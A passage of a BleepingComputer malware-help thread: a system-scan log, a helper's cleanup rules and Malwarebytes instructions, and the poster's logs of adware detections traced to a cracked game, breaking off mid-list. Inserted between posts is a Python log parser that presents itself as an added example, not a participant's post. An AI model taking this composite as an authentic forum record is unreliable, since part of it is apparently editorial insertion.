FirewallRules: [{26F4CBDA-4371-4EAD-B563-EAE852FC431F}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{BDBA97C6-FD1B-42B8-88FC-9C16B6254642}] => (Allow) LPort=6892
FirewallRules: [{731C492E-74B2-4D2A-8779-E50950416C7D}] => (Allow) LPort=6892
FirewallRules: [TCP Query User{0255E972-67C9-4B8C-95DE-03323BD3FF0D}D:\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe] => (Allow) D:\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe
FirewallRules: [UDP Query User{6E83EA68-00DC-4169-A094-F789E1757D69}D:\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe] => (Allow) D:\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe
FirewallRules: [{891B98D6-3EF8-43F0-8406-A30710E90750}] => (Allow) C:\Program Files (x86)\Garena\Garena\2.0.1711.3015\gxxsvc.exe
FirewallRules: [TCP Query User{95CE1ED5-6506-482C-BC0E-FFFF7387BA8F}D:\nba 2k17\nba2k17.exe] => (Allow) D:\nba 2k17\nba2k17.exe
FirewallRules: [UDP Query User{E6DA95A3-DBE6-497B-A0FB-5D7ED847D4E2}D:\nba 2k17\nba2k17.exe] => (Allow) D:\nba 2k17\nba2k17.exe
FirewallRules: [{42583FD8-B4D0-4C0B-AC9E-40DA40E99806}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{88482871-4A19-4DD6-905E-E71355AEE5DF}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{9401402E-541B-4707-93B6-88E1D74B35AD}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{BB633BA4-8699-4DBA-89F9-60BABF465FDC}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{6011B792-0F73-43AB-9AE2-D2C47899117A}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{5C2CC801-08FC-441F-8D6B-02AC83C928C7}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{51183DEC-D785-4AFF-887F-6ECF61F78025}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{B6D1E1DD-0C00-4B29-B9A2-F7AE7933D0F5}] => (Allow) D:\Steam\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{8624CD54-15CE-4C7B-BE37-4ABE95783052}] => (Allow) D:\Steam\steamapps\common\MGS_TPP\mgsvtpp.exe
FirewallRules: [{1D42CF22-B020-4D14-A2B4-A4B91121279E}] => (Allow) D:\Steam\steamapps\common\MGS_TPP\mgsvtpp.exe
FirewallRules: [{642A7421-22E5-4958-A5BC-4943709BA333}] => (Allow) D:\Steam\steamapps\common\Borderlands 2\Binaries\Win32\Launcher.exe
FirewallRules: [{A2D74A89-F908-4D90-9B4F-2960AF36E9EE}] => (Allow) D:\Steam\steamapps\common\Borderlands 2\Binaries\Win32\Launcher.exe
FirewallRules: [{DA3AD731-DB1D-4B85-91E6-B6D90DD0C3B5}] => (Allow) D:\Steam\steamapps\common\Borderlands 2\Binaries\Win32\Borderlands2.exe
FirewallRules: [{FE9953FB-5543-49C2-8FD9-0E0EB15719FB}] => (Allow) D:\Steam\steamapps\common\Borderlands 2\Binaries\Win32\Borderlands2.exe
FirewallRules: [{21F1A58F-C40D-484A-AD74-CE3B1DE57DDC}] => (Allow) C:\Program Files\qBittorrent\qbittorrent.exe
FirewallRules: [{35377D1E-14D6-49B6-BBE2-DBC3981D1109}] => (Allow) C:\Program Files\qBittorrent\qbittorrent.exe
FirewallRules: [{DA4F0A2C-8549-4F7D-ABE3-FA891833CA71}] => (Allow) C:\Users\ouroboros\AppData\Local\Go!\Application\go.exe
 
==================== Restore Points =========================
 
29-12-2017 12:37:51 Scheduled Checkpoint
05-01-2018 09:03:43 Restore Operation
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (01/05/2018 09:55:28 AM) (Source: VSS) (EventID: 8193) (User: )
Description: Volume Shadow Copy Service error: Unexpected error calling routine QueryFullProcessImageNameW.  hr = 0x80070006, The handle is invalid.
.
 
 
Operation:
   Executing Asynchronous Operation
 
Context:
   Current State: DoSnapshotSet
 
Error: (01/05/2018 09:54:40 AM) (Source: VSS) (EventID: 8194) (User: )
Description: Volume Shadow Copy Service error: Unexpected error querying for the IVssWriterCallback interface.  hr = 0x80070005, Access is denied.
.
This is often caused by incorrect security settings in either the writer or requestor process.
 
 
Operation:
   Gathering Writer Data
 
Context:
   Writer Class Id: {e8132975-6f93-4464-a53e-1050253ae220}
   Writer Name: System Writer
   Writer Instance ID: {1b997ffc-8694-49fa-8e22-31687bc9855b}
 
Error: (01/05/2018 09:37:56 AM) (Source: System Restore) (EventID: 8210) (User: )
Description: An unspecified error occurred during System Restore: (Scheduled Checkpoint). Additional information: 0x80070005.
 
Error: (01/05/2018 09:19:47 AM) (Source: System Restore) (EventID: 8210) (User: )
Description: An unspecified error occurred during System Restore: (Scheduled Checkpoint). Additional information: 0x80070005.
 
Error: (01/04/2018 02:13:50 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3016) (User: NT AUTHORITY)
Description: Cannot update Object List value of SYSTEM\CurrentControlSet\Services\WmiApRpl\Performance key. The first DWORD in the Data section contains the error code and the second DWORD contains the updated value.
 
Error: (01/04/2018 02:13:50 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3016) (User: NT AUTHORITY)
Description: Cannot update First Help value of SYSTEM\CurrentControlSet\Services\WmiApRpl\Performance key. The first DWORD in the Data section contains the error code and the second DWORD contains the updated value.
 
Error: (01/04/2018 02:13:50 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3016) (User: NT AUTHORITY)
Description: Cannot update First Counter value of SYSTEM\CurrentControlSet\Services\WmiApRpl\Performance key. The first DWORD in the Data section contains the error code and the second DWORD contains the updated value.
 
Error: (01/04/2018 02:13:50 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3016) (User: NT AUTHORITY)
Description: Cannot update Last Help value of SYSTEM\CurrentControlSet\Services\WmiApRpl\Performance key. The first DWORD in the Data section contains the error code and the second DWORD contains the updated value.
 
Error: (01/04/2018 02:13:50 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3016) (User: NT AUTHORITY)
Description: Cannot update Last Counter value of SYSTEM\CurrentControlSet\Services\WmiApRpl\Performance key. The first DWORD in the Data section contains the error code and the second DWORD contains the updated value.
 
Error: (01/04/2018 01:58:47 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3016) (User: NT AUTHORITY)
Description: Cannot update Object List value of SYSTEM\CurrentControlSet\Services\WmiApRpl\Performance key. The first DWORD in the Data section contains the error code and the second DWORD contains the updated value.
 
 
System errors:
=============
Error: (01/05/2018 10:13:38 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID 
{D63B10C5-BB46-4990-A94F-E40B9D520160}
 and APPID 
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
 to the user NT AUTHORITY\LOCAL SERVICE SID (S-1-5-19) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
 
Error: (01/05/2018 10:06:45 AM) (Source: DCOM) (EventID: 10016) (User: ENJAY)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID 
{D63B10C5-BB46-4990-A94F-E40B9D520160}
 and APPID 
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
 to the user ENJAY\ouroboros SID (S-1-5-21-1787623747-1286628437-3931833605-1001) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
 
Error: (01/05/2018 09:58:38 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID 
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
 and APPID 
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
 to the user NT AUTHORITY\LOCAL SERVICE SID (S-1-5-19) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
 
Error: (01/05/2018 09:58:38 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID 
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
 and APPID 
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
 to the user NT AUTHORITY\LOCAL SERVICE SID (S-1-5-19) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
 
Error: (01/05/2018 09:58:38 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID 
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
 and APPID 
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
 to the user NT AUTHORITY\LOCAL SERVICE SID (S-1-5-19) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
 
Error: (01/05/2018 09:58:38 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID 
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
 and APPID 
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
 to the user NT AUTHORITY\LOCAL SERVICE SID (S-1-5-19) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
 
Error: (01/05/2018 09:58:38 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID 
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
 and APPID 
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
 to the user NT AUTHORITY\LOCAL SERVICE SID (S-1-5-19) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
 
Error: (01/05/2018 09:58:38 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID 
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
 and APPID 
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
 to the user NT AUTHORITY\LOCAL SERVICE SID (S-1-5-19) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.
 
Error: (01/05/2018 09:57:04 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has stopped unexpectedly.
 
Module Path: C:\WINDOWS\System32\IWMSSvc.dll
 
Error: (01/05/2018 09:57:04 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT AUTHORITY)
Description: WLAN Extensibility Module has stopped unexpectedly.
 
Module Path: C:\WINDOWS\System32\IWMSSvc.dll
 
 
CodeIntegrity:
===================================
  Date: 2018-01-05 10:18:19.571
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.
 
  Date: 2018-01-05 10:18:19.570
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.
 
  Date: 2018-01-05 10:15:19.218
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.
 
  Date: 2018-01-05 10:15:19.216
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.
 
  Date: 2018-01-05 10:13:02.435
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.
 
  Date: 2018-01-05 10:13:02.433
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.
 
  Date: 2018-01-05 10:08:20.496
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.
 
  Date: 2018-01-05 10:08:20.494
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.
 
  Date: 2018-01-05 10:08:18.730
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.
 
  Date: 2018-01-05 10:08:18.728
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i7-6700HQ CPU @ 2.60GHz
Percentage of memory in use: 18%
Total physical RAM: 16322.59 MB
Available physical RAM: 13287.15 MB
Total Virtual: 18754.59 MB
Available Virtual: 15653.72 MB
 
==================== Drives ================================
 
Drive c: (OS) (Fixed) (Total:371.85 GB) (Free:31.33 GB) NTFS
Drive d: (DATA) (Fixed) (Total:558.91 GB) (Free:125.38 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: BFE03C85)
 
Partition: GPT.
 
==================== End of Addition.txt ============================

 




#2 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,634 posts
  • Gender:Male
  • Local time:10:26 AM

Posted 05 January 2018 - 07:43 AM

Hi oneiric :)

My name is Aura and I'll be assisting you with your malware issue. Since we'll be working together, you can call me Aura or Yoan, which is my real name, it's up to you! Now that we've broken the ice, I'll just ask you a few things during the time we'll be working together to clean your system and get it back to an operational state.
  • As you'll notice, the logs we are asking for here are quite lengthy, so it's normal for me to not reply exactly after you post them. This is because I need some time to analyse them and then act accordingly. However, I'll always reply within 24 hours, 48 hours at most if something unexpected happens
  • As long as I'm assisting you on BleepingComputer, in this thread, I'll ask you to not seek assistance anywhere else for any issue related to the system we are working on. If you have an issue, question, etc. about your computer, please ask it in this thread and I'll assist you
  • The same principle applies to any modifications you make to your system, I would like you to ask me before you do any manipulations that aren't in the instructions I posted. This is to ensure that we are operating in sync and I know exactly what's happening on your system
  • If you aren't sure about an instruction I'm giving you, ask me about it. This is to ensure that the clean-up process goes without any issue. I'll answer you and even give you more precise instructions/explanations if you need. There's no shame in asking questions here, better be safe than sorry!
  • If you don't reply to your thread within 3 days, I'll bump this thread to let you know that I'm waiting for you. If you don't reply after 5 days, it'll be closed. If you return after that period, you can send me a PM to get it unlocked and we'll continue where we left off
  • Since malware can work quickly, we want to get rid of them as fast as we can, before they make unknown changes to the system. This being said, I would appreciate if you could reply to this thread within 24 hours of me posting. This way, we'll have a good clean-up rhythm and the chances of complications will be reduced
  • I'm against any form of pirated, illegal and counterfeit software and material. So if you have any installed on your system, I'll ask you to uninstall them right now. You don't have to tell me if you indeed had some or not, I'll give you the benefit of the doubt. Plus, this would be against BleepingComputer's rules
  • In the end, you are the one asking for assistance here. So if you wish to go a different way during the clean-up, like format and reinstall Windows, you are free to do so. I would appreciate you to let me know about it first, and if you need, I can also assist you in the process
  • I would appreciate if you were to stay with me until the end, which means, until I declare your system clean. Just because your system isn't behaving weirdly anymore, or is running better than before, it doesn't mean that the infection is completely gone
    This being said, I have a full time job so sometimes it'll take longer for me to reply to you. Don't worry, you'll be my first priority as soon as I get home and have time to look at your thread
This being said, it's time to clean up some malware, so let's get started, shall we? :)
 

Heeeey, so basically I tried downloading a cracked game a few days ago and it turns out to be a virus. Also whenever I start my laptop it pops up; it also pops up randomly.


Can you PM me the download link of that crack, or even better, the file you downloaded?

Edit: Also, follow the instructions below.

Malwarebytes - Clean Mode
  • Download and install the free version of Malwarebytes
    Note: If you have Malwarebytes already installed, you don't need to install it again. Simply start from the next bullet point
  • Once Malwarebytes is installed, launch it and let it update its database. You might have to click on the little arrow by Scan Status in the middle right pane for it to do so
  • Once the database update is complete, click on the Scan tab, then select the Threat Scan button and click on Start Scan
  • Let the scan run, the time required to complete the scan depends on your system and computer specs
  • Once the scan is complete, make sure that the first checkbox at the top is checked (which will automatically check every detected item), then click on the Quarantine Selected button
    • If it asks you to restart your computer to complete the removal, do so
  • Click on Export Summary after the deletion (in the bottom-left corner) and select Copy to Clipboard. Paste the content in your next reply

Edited by Aura, 05 January 2018 - 08:19 AM.

Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#3 oneiric

oneiric
  • Topic Starter

  • Members
  • 9 posts
  • Local time:10:26 PM

Posted 05 January 2018 - 08:54 AM

Heeey Yoan, thanks for assisting. I PM'ed you the link.

 

Here's the export summary as well. Also, I've used this program before posting the issue and it did remove some of the files I think; just wanted to let you know.

 

Malwarebytes
www.malwarebytes.com
 
-Log Details-
Scan Date: 1/5/18
Scan Time: 9:44 PM
Log File: 99d4c8d8-f21e-11e7-8381-2c56dc0b4679.json
Administrator: Yes
 
-Software Information-
Version: 3.3.1.2183
Components Version: 1.0.262
Update Package Version: 1.0.3629
License: Trial
 
-System Information-
OS: Windows 10 (Build 16299.125)
CPU: x64
File System: NTFS
User: ENJAY\ouroboros
 
-Scan Summary-
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 377206
Threats Detected: 0
(No malicious items detected)
Threats Quarantined: 0
(No malicious items detected)
Time Elapsed: 3 min, 35 sec
 
-Scan Options-
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Detect
PUM: Detect
 
-Scan Details-
Process: 0
(No malicious items detected)
 
Module: 0
(No malicious items detected)
 
Registry Key: 0
(No malicious items detected)
 
Registry Value: 0
(No malicious items detected)
 
Registry Data: 0
(No malicious items detected)
 
Data Stream: 0
(No malicious items detected)
 
Folder: 0
(No malicious items detected)
 
File: 0
(No malicious items detected)
 
Physical Sector: 0
(No malicious items detected)
 
 
(end)
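Reading these exported scan logs by hand gets tedious once they run to a hundred-plus items, and the line that matters most to a responder is easy to miss: a detection whose action is "Removal Failed" is something Malwarebytes saw but could not clean, so it is the item that has to be dealt with by other means. The parser below is an added example for this thread, not Malwarebytes' own tooling or anything the thread participants posted; it assumes only the export layout shown in the logs here (a `-Scan Summary-` block of `Key: value` lines followed by `-Scan Details-` categories and one comma-separated line per item). The embedded log is constructed to match that layout and is not a log from the poster's machine.

```python
import re
from collections import Counter

# Constructed sample in the export layout Malwarebytes 3.x produces (the same
# layout as the logs in this thread); it is not a log from the poster's machine.
SAMPLE_LOG = r"""Malwarebytes
www.malwarebytes.com

-Log Details-
Scan Date: 1/3/18
Scan Time: 11:58 PM
Administrator: Yes

-Scan Summary-
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 379739
Threats Detected: 3
Threats Quarantined: 2
Time Elapsed: 3 min, 54 sec

-Scan Details-
Process: 0
(No malicious items detected)

Registry Key: 1
PUP.Optional.ExampleFamily, HKLM\SOFTWARE\WOW6432NODE\GOOGLE\CHROME\EXTENSIONS\aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, Quarantined, [10], [475090],1.0.3615

File: 2
PUP.Optional.ExampleFamily, C:\USERS\EXAMPLE\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Removal Failed, [10], [475090],1.0.3615
PUP.Optional.OtherFamily, C:\WINDOWS\TASKS\Example Task.job, Quarantined, [58], [308966],1.0.3615

(end)
"""

# Category headers inside -Scan Details-, e.g. "Registry Key: 35".
CATEGORY_RE = re.compile(
    r"^(Process|Module|Registry Key|Registry Value|Registry Data|Data Stream"
    r"|Folder|File|Physical Sector): (\d+)$"
)
# One item: "<family>, <location>, <action>, [<id>], [<sig>],<db-version>".
# The location is matched greedily so a comma inside a path does not split it;
# the action is whatever words sit between the last ", " and " [".
DETECTION_RE = re.compile(
    r"^(?P<family>[^,]+), (?P<location>.+), (?P<action>[A-Za-z][A-Za-z -]*?), "
    r"\[(?P<id>-?\d+)\], \[(?P<sig>-?\d+)\],(?P<db>\S+)$"
)
# Summary keys whose values are integers.
COUNT_KEYS = ("Objects Scanned", "Threats Detected", "Threats Quarantined")


def parse_mbam_log(text):
    """Return {'summary': {...}, 'detections': [...]} from an exported scan log."""
    summary = {}
    detections = []
    section = None
    category = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("-") and line.endswith("-"):
            section = line.strip("-")  # "-Scan Summary-" -> "Scan Summary"
            continue
        if section == "Scan Summary":
            key, _, value = line.partition(": ")
            summary[key] = int(value) if key in COUNT_KEYS else value
        elif section == "Scan Details":
            m = CATEGORY_RE.match(line)
            if m:
                category = m.group(1)
                continue
            m = DETECTION_RE.match(line)
            if m:
                detections.append({"category": category, **m.groupdict()})
    return {"summary": summary, "detections": detections}


def triage(report):
    """Summarise a parsed log: families seen, items that could not be removed,
    and whether the per-item lines agree with the summary counts."""
    detections = report["detections"]
    failed = [d["location"] for d in detections if d["action"] == "Removal Failed"]
    summary = report["summary"]
    # In this export format every detected item that was not "Removal Failed"
    # (Quarantined or Replaced) is counted under "Threats Quarantined".
    consistent = (
        summary.get("Threats Detected") == len(detections)
        and summary.get("Threats Quarantined") == len(detections) - len(failed)
    )
    return {
        "families": dict(Counter(d["family"] for d in detections)),
        "failed": failed,
        "consistent": consistent,
    }


if __name__ == "__main__":
    result = triage(parse_mbam_log(SAMPLE_LOG))
    for family, n in sorted(result["families"].items()):
        print(f"{n:4d}  {family}")
    for location in result["failed"]:
        print("NOT REMOVED:", location)
    print("summary agrees with item lines:", result["consistent"])
```

The consistency check is there because a hand-edited or truncated paste is a common problem when logs are exchanged on a forum: if the item lines do not add up to the summary counts, the log is incomplete and should be re-exported rather than reasoned about.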


#4 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,634 posts
  • Gender:Male
  • Local time:10:26 AM

Posted 05 January 2018 - 09:54 AM

Can you provide me the past Malwarebytes logs showing the detections? We'll get to the clean-up right after. We're just trying to gather as much information as possible about this infection so we can pass it along to security vendors :)



#5 oneiric

oneiric
  • Topic Starter

  • Members
  • 9 posts
  • Local time:10:26 PM

Posted 05 January 2018 - 10:22 AM

Here are the logs that showed detections.
 
Malwarebytes
www.malwarebytes.com
 
-Log Details-
Scan Date: 1/3/18
Scan Time: 11:58 PM
Log File: e1bb87bc-f09e-11e7-a25b-2c56dc0b4679.json
Administrator: Yes
 
-Software Information-
Version: 3.3.1.2183
Components Version: 1.0.262
Update Package Version: 1.0.3615
License: Trial
 
-System Information-
OS: Windows 10 (Build 16299.125)
CPU: x64
File System: NTFS
User: ENJAY\ouroboros
 
-Scan Summary-
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 379739
Threats Detected: 2
Threats Quarantined: 1
Time Elapsed: 3 min, 54 sec
 
-Scan Options-
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Detect
PUM: Detect
 
-Scan Details-
Process: 0
(No malicious items detected)
 
Module: 0
(No malicious items detected)
 
Registry Key: 1
PUP.Optional.RussAd, HKLM\SOFTWARE\WOW6432NODE\GOOGLE\CHROME\EXTENSIONS\lfgkmlldjpjacgicdjmmgcboihbghpal, Quarantined, [10], [475090],1.0.3615
 
Registry Value: 0
(No malicious items detected)
 
Registry Data: 0
(No malicious items detected)
 
Data Stream: 0
(No malicious items detected)
 
Folder: 0
(No malicious items detected)
 
File: 1
PUP.Optional.RussAd, C:\USERS\OUROBOROS\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Removal Failed, [10], [475090],1.0.3615
 
Physical Sector: 0
(No malicious items detected)
 
 
(end)
 
Malwarebytes
www.malwarebytes.com
 
-Log Details-
Scan Date: 1/3/18
Scan Time: 2:45 PM
Log File: af000ac0-f051-11e7-9346-2c56dc0b4679.json
Administrator: Yes
 
-Software Information-
Version: 3.3.1.2183
Components Version: 1.0.262
Update Package Version: 1.0.3611
License: Trial
 
-System Information-
OS: Windows 10 (Build 16299.125)
CPU: x64
File System: NTFS
User: ENJAY\ouroboros
 
-Scan Summary-
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 380015
Threats Detected: 149
Threats Quarantined: 144
Time Elapsed: 9 min, 13 sec
 
-Scan Options-
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Detect
PUM: Detect
 
-Scan Details-
Process: 0
(No malicious items detected)
 
Module: 0
(No malicious items detected)
 
Registry Key: 35
PUP.Optional.WinYahoo, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Yahoo! Powered fisal, Quarantined, [58], [308969],1.0.3611
PUP.Optional.WinYahoo, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{BBA5791A-0D72-4917-8082-E0C646CDBFCD}, Quarantined, [58], [308969],1.0.3611
PUP.Optional.WinYahoo, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{BBA5791A-0D72-4917-8082-E0C646CDBFCD}, Quarantined, [58], [308969],1.0.3611
PUP.Optional.WinYahoo.TskLnk, HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Yahoo! Powered fisal, Quarantined, [495], [-1],0.0.0
PUP.Optional.WinYahoo.TskLnk, HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BBA5791A-0D72-4917-8082-E0C646CDBFCD}, Quarantined, [495], [-1],0.0.0
PUP.Optional.WinYahoo.TskLnk, HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{BBA5791A-0D72-4917-8082-E0C646CDBFCD}, Quarantined, [495], [-1],0.0.0
PUP.Optional.WinYahoo.TskLnk, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\{447123AD-7416-1893-A863-7ED1A81B6B4D}, Quarantined, [495], [455040],1.0.3611
PUP.Optional.WinYahoo.TskLnk, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{9F6A0D17-65D3-4C2C-BE0F-703FDFA94CB9}, Quarantined, [495], [455040],1.0.3611
PUP.Optional.WinYahoo.TskLnk, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{9F6A0D17-65D3-4C2C-BE0F-703FDFA94CB9}, Quarantined, [495], [455040],1.0.3611
PUP.Optional.WinYahoo.TskLnk, HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{447123AD-7416-1893-A863-7ED1A81B6B4D}, Quarantined, [495], [-1],0.0.0
PUP.Optional.WinYahoo.TskLnk, HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9F6A0D17-65D3-4C2C-BE0F-703FDFA94CB9}, Quarantined, [495], [-1],0.0.0
PUP.Optional.WinYahoo.TskLnk, HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{9F6A0D17-65D3-4C2C-BE0F-703FDFA94CB9}, Quarantined, [495], [-1],0.0.0
PUP.Optional.StartPage, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\BLTOPNCOMHOHOJ, Quarantined, [40], [474793],1.0.3611
PUP.Optional.StartPage, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{09D44C2A-F732-482A-9D07-60B1ECD11A01}, Quarantined, [40], [474793],1.0.3611
